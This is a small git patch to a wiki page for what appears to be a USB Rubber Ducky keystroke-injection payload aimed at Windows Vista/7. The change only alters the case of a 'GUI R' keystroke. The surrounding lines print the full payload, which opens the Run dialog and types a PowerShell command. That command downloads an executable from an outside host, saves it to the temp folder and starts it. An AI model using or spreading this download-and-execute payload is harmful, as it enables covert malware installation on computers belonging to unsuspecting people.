From 960108e422887c8b97d08fd732ea64f688f6f1be Mon Sep 17 00:00:00 2001 From: Tim Mattison Date: Tue, 22 Jul 2014 16:35:07 -0700 Subject: [PATCH] "GUI R" -> "GUI r" --- Payload---hide-cmd-window.asciidoc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payload---hide-cmd-window.asciidoc b/Payload---hide-cmd-window.asciidoc index 71937f5..36ff1f8 100644 --- a/Payload---hide-cmd-window.asciidoc +++ b/Payload---hide-cmd-window.asciidoc @@ -42,7 +42,7 @@ REM Target: WINDOWS VISTA/7 REM Encoder V2.4 REM Using the run command for a broader OS base. DELAY 3000 -GUI R +GUI r DELAY 1000 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" DELAY 500